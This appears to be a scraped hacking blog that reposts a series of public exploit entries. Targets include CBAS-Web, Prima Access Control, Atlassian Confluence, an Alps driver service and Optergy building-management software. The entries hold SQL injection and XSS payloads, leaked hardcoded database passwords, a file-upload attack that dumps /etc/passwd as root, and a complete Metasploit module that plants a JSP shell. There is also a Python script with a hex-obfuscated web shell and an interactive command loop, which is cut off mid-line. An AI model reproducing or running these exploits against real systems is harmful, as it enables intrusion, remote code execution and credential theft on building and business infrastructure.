    # Exploit Title: CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection # Google Dork: NA # Date: 2019-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 19.0.0 # Tested on: NA # CVE : N/A # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Computrols CBAS-Web Authenticated Boolean-based Blind SQL Injection # PoC (id param): http://192.168.1.250/cbas/index.php?m=servers&a=start_pulling&id=1 AND 2510=2510
  16. HireHackking

    CBAS-Web 19.0.0 - Username Enumeration

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CBAS-Web 19.0.0 - Username Enumeration # Google Dork: NA # Date: 2019-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 19.0.0 # Tested on: NA # CVE : CVE-2019-10848 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Testing for non-valid user: POST /cbas/index.php?m=auth&a=login HTTP/1.1 username=randomuser&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62 # Response for non-valid user: <!-- Failed login comments appear here --> <p class="alert-error">randomuser</p> ======================================================================== Testing for valid user: POST /cbas/index.php?m=auth&a=login HTTP/1.1 username=admin&password=&challenge=6e4344e7ac62520dba82d7f20ccbd422&response=e09aab669572a8e4576206d5c14befc5s # Response for valid user: <!-- Failed login comments appear here --> <p class="alert-error">Invalid username/password combination. Please try again!</p>
  17. HireHackking

    CBAS-Web 19.0.0 - Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CBAS-Web 19.0.0 - Information Disclosure # Google Dork: NA # Date: 2019-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 19.0.0 # Tested on: NA # CVE : CVE-2019-10849 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system $ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep openssl openssl enc -d -bf -pass pass:"WebAppEncoding7703" -in $FILE -out $filename.sql.gz $ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep "\-\-password" #for i in `mysql -B -u root --password="souper secrit" -e "show tables" wadb`; do # mysql -u root --password="souper secrit" -e "describe $i" wadb; mysql -u root --password="souper secrit" $DB < $filename.sql $MYSQL -u root --password="souper secrit" -e "$SQL"
  18. HireHackking

    Prima Access Control 2.3.35 - Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Prima Access Control 2.3.35 - Arbitrary File Upload # Google Dork: NA # Date: 2019-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 2.3.35 # Tested on: NA # CVE : CVE-2019-9189 # Advisory: https://applied-risk.com/resources/ar-2019-007 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Prima Access Control 2.3.35 Authenticated Stored XSS # PoC --- POST /bin/sysfcgi.fx HTTP/1.1 Host: 192.168.13.37 Connection: keep-alive Content-Length: 572 Origin: https://192.168.13.37 Session-ID: 5682699 User-Agent: Mozi-Mozi/44.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: text/html, */*; q=0.01 Session-Pc: 2 X-Requested-With: XMLHttpRequest Referer: https://192.168.13.37/app/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: G_ENABLED_IDPS=google <requests><request name="PythonScriptUpload"><param name="DestinationHwID" value="1"/><param name="FileName" value="test_python.py"/><param name="Content" value="#!/usr/bin/python&#xA;#&#xA;# test script&#xA;#&#xA;&#xA;import sys,os&#xA;&#xA;with open("/etc/passwd") as f:&#xA; with open("/www/pages/app/images/logos/testingus2.txt", "w") as f1:&#xA; for line in f:&#xA; f1.write(line)&#xA;&#xA;&#xA;os.system("id;uname -a >> /www/pages/app/images/logos/testingus2.txt")"/></request></requests> Result: $ curl https://192.168.13.37/app/images/logos/testingus2.txt root:x:0:0:root:/home/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/false bin:x:2:2:bin:/bin:/bin/false sys:x:3:3:sys:/dev:/bin/false sync:x:4:100:sync:/bin:/bin/sync mail:x:8:8:mail:/var/spool/mail:/bin/false www-data:x:33:33:www-data:/var/www:/bin/false operator:x:37:37:Operator:/var:/bin/false nobody:x:99:99:nobody:/home:/bin/false python:x:1000:1000:python:/home/python:/bin/false admin:x:1001:1001:Linux User,,,:/home/admin:/bin/sh uid=0(root) gid=0(root) groups=0(root),10(wheel) Linux DemoMaster214 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux
  19. HireHackking

    Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting # Google Dork: NA # Date: 2019-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 2.3.35 # Tested on: NA # CVE : CVE-2019-7671 # Advisory: https://applied-risk.com/resources/ar-2019-007 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Prima Access Control 2.3.35 Authenticated Stored XSS # PoC POST /bin/sysfcgi.fx HTTP/1.1 Host: 192.168.13.37 Connection: keep-alive Content-Length: 265 Origin: https://192.168.13.37 Session-ID: 10127047 User-Agent: Mozi-Mozi/44.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: text/html, */*; q=0.01 Session-Pc: 2 X-Requested-With: XMLHttpRequest Referer: https://192.168.13.37/app/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 <requests><request name="CreateDevice"><param name="HwType" value="1000"/><param name="HwParentID" value="0"/><param name="HwLogicParentID" value="0"/><param name="HwName" value=""><script>alert("XSSz")</script>"/></request></requests>
  20. HireHackking

    Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit) # Google Dork: N/A # Date: 2019-11-11 # Exploit Author: max7253 # Vendor Homepage: https://www.atlassian.com # Software Link: https://www.atlassian.com/software/confluence/download-archives # Version: 6.15.1 # Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, Linux 5.0.0-23-generic #24~18.04.1-Ubuntu # CVE : N/A ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Confluence Arbitrary File Write via Path Traversal (CVE-2019-3398)", 'Description' => %q{ To use this exploit you should specify the following variables: USERNAME and PASSWORD - the login/password to log into the web interface of the Atlassian Confluence server. ROOTFOLDER - the root directory of the web server. If the root directory is located in C:\confluence\pages\, set this variable to ROOTFOLDER = 'confluence/pages/'. Typical ROOTFOLDER locations are: Windows: Program Files/Atlassian/Confluence/confluence/pages/ Linux: opt/atlassian/confluence/confluence/pages/ Note that the root directory of the web server and the temporary directory of the Atlassian Confluence server on Windows must be on the same drive (C:\ in the example above). PAGEID - the pageId URL parameter you see in the browser address bar when you vist the Atlassian Confluence page where you have rights to upload files. For example, https://server.net/pages/viewpageattachments.action?pageId=111111111&metadataLink=true. If PAGEID is set to 0, the script will try to create a new Page ID. If it fails, it will try to create a new space and create a Page ID there. If PAGEID is not specified, the script will walk though the PAGEID_RANGE_START..PAGEID_RANGE_END range. The script gets authenticated to the Atlassian Confluence server, retrieves the ATLASSIAN TOKEN from the server response, uploads the shellcode, then imitates the 'Download all' action to place the shellcode to the root directory of the web server. Tested on Atlassian v6.15.1. on Linux and Windows. Note that on Linux Confluence runs under the 'confluence' account which may not have rights to save files in the root directory of the web server. In this case the exploit will fail. Also, to create a new space and get the list of existing spaces the script makes use of Confluence REST API, which is available starting from Confluence Server 5.5. }, 'License' => MSF_LICENSE, 'Author' => [ 'Maxim Guslyaev' # Metasploit module ], 'References' => [ [ 'CVE', '2019-3398' ], [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-04-17-968660855.html' ], [ 'URL', 'https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181'], [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-3398'] ], 'Privileged' => false, 'Platform' => %w{ linux win }, 'Targets' => [ [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_JAVA }], [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_JAVA }] ], 'DefaultOptions' => { 'RPORT' => 8090, 'SSL' => false }, 'DisclosureDate' => 'Nov 9 2019', 'DefaultTarget' => 0 )) register_options( [ OptString.new('USERNAME', [true, 'The login to log into the web interface of the Atlassian Confluence server', 'test']), OptString.new('PASSWORD', [true, 'The password to log into the web interface of the Atlassian Confluence server', 'test']), OptString.new('ROOTFOLDER', [true, 'The root folder of the Atlassian Confluence server', 'Program Files/Atlassian/Confluence/confluence/pages/']), #OptString.new('ROOTFOLDER', [true, 'The root folder of the Atlassian Confluence server', 'opt/atlassian/confluence/confluence/pages/']), OptString.new('FILENAME', [true, 'The JSP shellcode file name', 'covfefe.jsp']), OptString.new('TARGETURI', [true, 'The base to Confluence', '/']), OptString.new('NEWSPACE', [false, 'A new space to be created', 'TESTSPACE432545645']), OptInt.new('PAGEID', [false, 'A Page ID to be used to upload shellcode', 0]), OptInt.new('PAGEID_RANGE_START', [false, 'The first Page ID to be used to enumerate a writable Page ID (used when PAGEID is not specified)', '1']), OptInt.new('PAGEID_RANGE_END', [false, 'The last Page ID to be used to enumerate a writable Page ID (used when PAGEID is not specified)', '999999999']), ], self.class) end def do_authenticate print_status("Sending POST request to the web application (authentication)...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, '/dologin.action'), 'method' => 'POST', 'vars_post' => { 'os_username' => datastore['USERNAME'], 'os_password' => datastore['PASSWORD'], 'os_destination' => '', 'login' => 'Log+In' } }) if res.nil? print_status("Unable to access the web application!") return 0 end @sessid = get_sid(res) if @sessid.nil? print_status("Unable to retrieve session ID!") return 0 end print_status("Getting Session ID from the web application... #{@sessid}") if res && res.redirect? location = res.redirection if location.nil? print_status("Unable to access the web application when redirected!") return 0 end res = send_request_cgi!({ 'uri' => normalize_uri(target_uri.path.to_s, location.to_s), 'method' => 'GET', 'headers' => { 'Cookie' => @sessid } }, redirect_depth = 5) end if res && res.code == 200 if res.body =~ /re-enter\syour\slogin/ || res.body =~ /Sorry,\syour\susername\sand\/or\spassword\sare\sincorrect/ || res.body =~ /Unauthorized/ print_status("Authentication failed...") return 0 end @xsrf_token = res.get_html_document.at('meta[@id="atlassian-token"]')['content'] if @xsrf_token.nil? or @xsrf_token.blank? print_status("Failed to retrieve XSRF token...") return 0 else print_status("Retrieving XSRF token... #{@xsrf_token}") return 1 end else print_status("Unexpected response from the web application...") return 0 end end def do_upload(_pageid) print_status("Sending POST request to the web application (shellcode upload)...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, '/plugins/drag-and-drop/upload.action'), 'method' => 'POST', 'vars_get' => { 'pageId' => _pageid, 'filename' => '../../../../../../../../../../' + datastore['ROOTFOLDER'] + datastore['FILENAME'], 'size' => payload.encoded.length, 'mimeType' => 'text/plain', 'spaceKey' => 'isis', 'atl_token' => @xsrf_token, 'name' => datastore['FILENAME'] }, 'data' => payload.encoded, 'headers' => { 'Connection' => 'close', 'Accept' => '*/*', 'Accept-Encoding' => 'identity', 'Cookie' => @sessid, 'Content-Length' => payload.encoded.length, 'Content-Type' => 'text/plain' } }) if res && res.code == 200 && res.body.scan(/actionErrors/).blank? print_status("Shellcode uploaded...") return 1 else return 0 end end def do_downloadall(_pageid) for downloadall_iter in 1..10 print_status("Sending GET request to the web application (downloadall)...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, '/pages/downloadallattachments.action'), 'method' => 'GET', 'vars_get' => { 'pageId' => _pageid }, 'headers' => { 'Cookie' => @sessid } }) print_status("Sending GET request to the web application (shellcode invokation)...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, '/pages/' + datastore['FILENAME']), 'method' => 'GET', 'headers' => { 'Cookie' => @sessid } }, timeout = 10) if res && res.code == 200 print_status("Shellcode found...") return 1 else if downloadall_iter == 10 print_status("Shellcode not found...") return 0 end end end end def do_getspaces print_status("Sending GET request to the web application (getting available spaces)...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, '/rest/api/space'), 'method' => 'GET', 'headers' => { 'User-Agent' => 'python-requests/2.20.0', 'Cookie' => @sessid, 'Accept' => '*/*', 'Accept-Encoding' => 'identity', 'Content-Type' => 'application/json' } }) if res && res.code == 200 && res.body =~ /results/ space_list = res.body.scan(/\"key\":\"(\w+)\"/).flatten else space_list = Array([]) end return space_list end def do_createspace print_status("Sending POST request to the web application (creating a space)...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, '/rest/api/space'), 'method' => 'POST', 'data' => { "key": datastore['NEWSPACE'], "name": "Example space", "description": { "plain": { "value": "This is an example space", "representation": "plain" } }, "metadata": {} }.to_json, 'headers' => { 'User-Agent' => 'python-requests/2.20.0', 'Cookie' => @sessid, 'Accept-Encoding' => 'identity', 'Content-Type' => 'application/json' } }) if res && res.code == 200 && res.body =~ /\"key\":\"\w+\"/ print_status("Space created...") return res.body.scan(/\"key\":\"(\w+)\"/).flatten[0] else print_status("Space not created...") return 0 end end def do_createpage(_space) print_status("Sending GET request to the web application (creating Page ID), space #{_space}...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, '/pages/createpage.action?spaceKey='+_space), 'method' => 'GET', 'headers' => { 'Cookie' => @sessid } }) if res && res.code == 200 && res.body =~ /ajs-draft-id/ pageid = res.get_html_document.at('meta[@name="ajs-draft-id"]')['content'] pageid_parsed = /(\d+)/.match(pageid) if pageid_parsed.nil? print_status("Unexpected Page ID format...") return 0 else print_status("Page ID created... #{pageid}") datastore['PAGEID'] = pageid return 1 end else return 0 end end def get_sid(res) if res.nil? return '' end res.get_cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || '' end def exploit print_status("Getting authenticated to the web application...") if do_authenticate != 1 fail_with(Failure::Unknown, 'Initial access or authentication error!') end unless datastore['PAGEID'].blank? if datastore['PAGEID'] == 0 print_status("Creating Page ID...") spaces = do_getspaces for sp in spaces if do_createpage(sp) == 1 print_status("Uploading shellcode...") if do_upload(datastore['PAGEID']) != 1 print_status("Failed to upload shellcode...") next end print_status("Invoking shellcode...") if do_downloadall(datastore['PAGEID']) != 1 print_status("Failed to invoke shellcode...") next else return end end end print_status("Trying to create a new space...") new_sp = do_createspace if new_sp != 0 if do_createpage(new_sp) == 1 print_status("Uploading shellcode...") if do_upload(datastore['PAGEID']) != 1 fail_with(Failure::Unknown, 'Error while uploading shellcode!') end print_status("Invoking shellcode...") if do_downloadall(datastore['PAGEID']) != 1 fail_with(Failure::Unknown, 'Error while invoking shellcode!') end return else fail_with(Failure::Unknown, 'Error while creating page in the newly created space!') end else fail_with(Failure::Unknown, 'Error while creating space!') end end print_status("Uploading shellcode...") if do_upload(datastore['PAGEID']) != 1 fail_with(Failure::Unknown, 'Error while uploading shellcode!') end print_status("Invoking shellcode...") if do_downloadall(datastore['PAGEID']) != 1 fail_with(Failure::Unknown, 'Error while invoking shellcode!') end else for id in datastore['PAGEID_RANGE_START']..datastore['PAGEID_RANGE_END'] print_status("Trying Page Id #{id}") print_status("Uploading shellcode...") if do_upload(id) == 1 print_status("Invoking shellcode...") if do_downloadall(id) == 1 break end end end end end def check res = send_request_cgi!({ 'uri' => normalize_uri(target_uri.path.to_s, '/login.action?anon=1&logout=1'), 'method' => 'GET', }, redirect_depth = 5) if res && res.body =~ /Powered\sby/ ver = res.body.scan(/^.*Powered\sby\s.*(\d{1,}\.\d{1,}\.\d{1,}).*$/).flatten[0] print_status("The version of the web application is #{ver}") ver_parsed = /(\d+)\.(\d+)\.(\d+)/.match(ver.to_s) if ver_parsed.nil? print_status("The version of the web application couldn't be parsed") return Exploit::CheckCode::Detected end ver_oct1 = ver_parsed[1].to_i ver_oct2 = ver_parsed[2].to_i ver_oct3 = ver_parsed[3].to_i if ver_oct1.between?(2, 6) && ver_oct2.between?(0, 6) && ver_oct3.between?(0, 12) || ver_oct1.between?(6, 6) && ver_oct2.between?(7, 12) && ver_oct3.between?(0, 3) || ver_oct1.between?(6, 6) && ver_oct2.between?(13, 13) && ver_oct3.between?(0, 3) || ver_oct1.between?(6, 6) && ver_oct2.between?(14, 14) && ver_oct3.between?(0, 2) || ver_oct1.between?(6, 6) && ver_oct2.between?(15, 15) && ver_oct3.between?(0, 1) return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end else return Exploit::CheckCode::Unknown end end end
  21. HireHackking

    Alps Pointing-device Controller 8.1202.1711.04 - 'ApHidMonitorService' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Alps Pointing-device Controller 8.1202.1711.04 - 'ApHidMonitorService' Unquoted Service Path # Date: 2019-11-12 # Exploit Author: Mario Rodriguez # Vendor Homepage: https://www.alps.com/e/ # Software Link: https://www.alps.com/e/ # Version: 8.1202.1711.04 # Tested on: Windows 10 Home x64 Spanish #The Alps Pointing-device controller installs a service with an unquoted path #which could be used as a local privilege escalation vulnerability. To exploit this vulnerability, #an executable file could be placed in the path of the service and after rebooting the system or #restarting the service the malicious code will be executed with elevated privileges. #Step to discover the vulnerability C:\Users\user>wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ Alps HID Monitor Service ApHidMonitorService C:\Program Files\Apoint2K\HidMonitorSvc.exe Auto C:\Users\user>sc qc ApHidMonitorService [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: ApHidMonitorService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Apoint2K\HidMonitorSvc.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Alps HID Monitor Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  22. HireHackking

    Optergy 2.3.0a - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Title: Optergy 2.3.0a - Remote Code Execution # Author: LiquidWorm # Date: 2019-11-05 # Vendor: https://optergy.com/ # Product web page: https://optergy.com/products/ # Affected version: <=2.3.0a # Advisory: https://applied-risk.com/resources/ar-2019-008 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # CVE: CVE-2019-7274 #!/usr/bin/env python # -*- coding: utf8 -*- # ########################################################################## # # lqwrm@metalgear:~/stuff/optergy$ python optergy_rfm.py # [+] Usage: optergy_rfm.py http://IP # [+] Example: optergy_rfm.py http://10.0.0.17 # # lqwrm@metalgear:~/stuff/optergy$ python optergy_rfm.py http://192.168.232.19 # Enter username: podroom # Enter password: podroom # # Welcome to Optergy HTTP Shell! # You can navigate to: http://192.168.232.19/images/jox.jsp # Or you can continue using this 'shell'. # Type 'exit' for exit. # # root@192.168.232.19:~# id # uid=1000(optergy) gid=1000(optergy) groups=1000(optergy),4(adm) # root@192.168.232.19:~# sudo id # uid=0(root) gid=0(root) groups=0(root) # root@192.168.232.19:~# rm /usr/local/tomcat/webapps/ROOT/images/jox.jsp # # root@192.168.232.19:~# exit # Have a nice day! # ########################################################################## import requests import sys,os,time,re piton = os.path.basename(sys.argv[0]) if len(sys.argv) < 2: print "[+] Usage: " + piton + " http://IP" print "[+] Example: " + piton + " http://10.0.0.17\n" sys.exit() the_user = raw_input("Enter username: ") the_pass = raw_input("Enter password: ") the_host = sys.argv[1] odi = requests.Session() the_url = the_host + "/ajax/AjaxLogin.html?login" the_headers = {"Accept" : "*/*", "X-Requested-With" : "XMLHttpRequest", "User-Agent" : "Noproblem/16.0", "Content-Type" : "application/x-www-form-urlencoded", "Accept-Encoding" : "gzip, deflate", "Accept-Language" : "en-US,en;q=0.9"} the_data = {"username" : the_user, "password" : the_pass, "token" : ''} odi.post(the_url, headers = the_headers, data = the_data) the_upl = ("\x2f\x61\x6a\x61\x78\x2f\x46\x69\x6c\x65\x55\x70\x6c\x6f\x61\x64" "\x65\x72\x2e\x68\x74\x6d\x6c\x3f\x69\x64\x54\x6f\x55\x73\x65\x3d" "\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x2d\x31\x35\x34\x36\x30" "\x30\x32\x33\x36\x39\x39\x33\x39\x26\x64\x65\x63\x6f\x6d\x70\x72" "\x65\x73\x73\x3d\x66\x61\x6c\x73\x65\x26\x6f\x75\x74\x70\x75\x74" "\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3d\x25\x32\x46\x75\x73\x72\x25" "\x32\x46\x6c\x6f\x63\x61\x6c\x25\x32\x46\x74\x6f\x6d\x63\x61\x74" "\x25\x32\x46\x77\x65\x62\x61\x70\x70\x73\x25\x32\x46\x52\x4f\x4f" "\x54\x25\x32\x46\x69\x6d\x61\x67\x65\x73\x25\x32\x46\x26\x66\x69" "\x6c\x65\x4e\x61\x6d\x65\x3d\x6a\x6f\x78\x2e\x6a\x73\x70")######" the_url = the_host + the_upl the_headers = {"Cache-Control" : "max-age=0", "Content-Type" : "multipart/form-data; boundary=----WebKitFormBoundarysrMvKmQPYUODSWBl", "User-Agent" : "Noproblem/16.0", "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Encoding" : "gzip, deflate", "Accept-Language" : "en-US,en;q=0.9"} the_data = ("\x2d\x2d\x2d\x2d\x2d\x2d\x57\x65\x62\x4b\x69\x74\x46\x6f\x72\x6d" "\x42\x6f\x75\x6e\x64\x61\x72\x79\x73\x72\x4d\x76\x4b\x6d\x51\x50" "\x59\x55\x4f\x44\x53\x57\x42\x6c\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" "\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x66" "\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x20\x6e\x61\x6d\x65\x3d\x22" "\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x2d\x31\x35\x34\x36\x30" "\x30\x32\x33\x36\x39\x39\x33\x39\x22\x3b\x20\x66\x69\x6c\x65\x6e" "\x61\x6d\x65\x3d\x22\x6a\x6f\x78\x2e\x6a\x73\x70\x22\x0d\x0a\x43" "\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70" "\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73" "\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x3c\x25\x40\x20\x70\x61\x67" "\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61\x76\x61\x2e\x75" "\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a\x22" "\x25\x3e\x0a\x3c\x48\x54\x4d\x4c\x3e\x3c\x42\x4f\x44\x59\x3e\x0a" "\x3c\x46\x4f\x52\x4d\x20\x4d\x45\x54\x48\x4f\x44\x3d\x22\x47\x45" "\x54\x22\x20\x4e\x41\x4d\x45\x3d\x22\x6d\x79\x66\x6f\x72\x6d\x22" "\x20\x41\x43\x54\x49\x4f\x4e\x3d\x22\x22\x3e\x0a\x3c\x49\x4e\x50" "\x55\x54\x20\x54\x59\x50\x45\x3d\x22\x74\x65\x78\x74\x22\x20\x4e" "\x41\x4d\x45\x3d\x22\x63\x6d\x64\x22\x3e\x0a\x3c\x49\x4e\x50\x55" "\x54\x20\x54\x59\x50\x45\x3d\x22\x73\x75\x62\x6d\x69\x74\x22\x20" "\x56\x41\x4c\x55\x45\x3d\x22\x53\x65\x6e\x64\x22\x3e\x0a\x3c\x2f" "\x46\x4f\x52\x4d\x3e\x0a\x3c\x70\x72\x65\x3e\x0a\x3c\x25\x0a\x69" "\x66\x20\x28\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61" "\x72\x61\x6d\x65\x74\x65\x72\x28\x22\x63\x6d\x64\x22\x29\x20\x21" "\x3d\x20\x6e\x75\x6c\x6c\x29\x20\x7b\x0a\x20\x20\x20\x20\x20\x20" "\x20\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28\x22\x43" "\x6f\x6d\x6d\x61\x6e\x64\x3a\x20\x22\x20\x2b\x20\x72\x65\x71\x75" "\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65\x72" "\x28\x22\x63\x6d\x64\x22\x29\x20\x2b\x20\x22\x3c\x42\x52\x3e\x22" "\x29\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x50\x72\x6f\x63\x65" "\x73\x73\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67" "\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63" "\x28\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61" "\x6d\x65\x74\x65\x72\x28\x22\x63\x6d\x64\x22\x29\x29\x3b\x0a\x20" "\x20\x20\x20\x20\x20\x20\x20\x4f\x75\x74\x70\x75\x74\x53\x74\x72" "\x65\x61\x6d\x20\x6f\x73\x20\x3d\x20\x70\x2e\x67\x65\x74\x4f\x75" "\x74\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x3b\x0a\x20\x20" "\x20\x20\x20\x20\x20\x20\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61" "\x6d\x20\x69\x6e\x20\x3d\x20\x70\x2e\x67\x65\x74\x49\x6e\x70\x75" "\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x3b\x0a\x20\x20\x20\x20\x20" "\x20\x20\x20\x44\x61\x74\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65" "\x61\x6d\x20\x64\x69\x73\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74" "\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x69\x6e\x29" "\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x53\x74\x72\x69\x6e\x67" "\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69\x73\x2e\x72\x65\x61\x64" "\x4c\x69\x6e\x65\x28\x29\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20" "\x77\x68\x69\x6c\x65\x20\x28\x20\x64\x69\x73\x72\x20\x21\x3d\x20" "\x6e\x75\x6c\x6c\x20\x29\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x75\x74\x2e\x70\x72\x69" "\x6e\x74\x6c\x6e\x28\x64\x69\x73\x72\x29\x3b\x20\x0a\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x69\x73" "\x72\x20\x3d\x20\x64\x69\x73\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65" "\x28\x29\x3b\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d" "\x0a\x25\x3e\x0a\x3c\x2f\x70\x72\x65\x3e\x0a\x3c\x2f\x42\x4f\x44" "\x59\x3e\x3c\x2f\x48\x54\x4d\x4c\x3e\x0a\x0a\x0a\x0d\x0a\x2d\x2d" "\x2d\x2d\x2d\x2d\x57\x65\x62\x4b\x69\x74\x46\x6f\x72\x6d\x42\x6f" "\x75\x6e\x64\x61\x72\x79\x73\x72\x4d\x76\x4b\x6d\x51\x50\x59\x55" "\x4f\x44\x53\x57\x42\x6c\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d" "\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x66\x6f\x72" "\x6d\x2d\x64\x61\x74\x61\x3b\x20\x6e\x61\x6d\x65\x3d\x22\x75\x70" "\x6c\x6f\x61\x64\x22\x0d\x0a\x0d\x0a\x55\x70\x6c\x6f\x61\x64\x0d" "\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x57\x65\x62\x4b\x69\x74\x46\x6f\x72" "\x6d\x42\x6f\x75\x6e\x64\x61\x72\x79\x73\x72\x4d\x76\x4b\x6d\x51" "\x50\x59\x55\x4f\x44\x53\x57\x42\x6c\x2d\x2d\x0d\x0a")##########" odi.post(the_url, headers = the_headers, data = the_data) print "\nWelcome to Optergy HTTP Shell!" print "You can navigate to: " + the_host + "/images/jox.jsp" print "Or you can continue using this 'shell'." print "Type 'exit' for exit.\n" while True: try: cmd = raw_input("root@" + the_host[7:] + ":~# ") if cmd.strip() == "exit": print "Have a nice day!" break paramz = {"cmd" : cmd} # sudo cmd shell = requests.get(url = the_host + "/images/jox.jsp", params = paramz) regex = 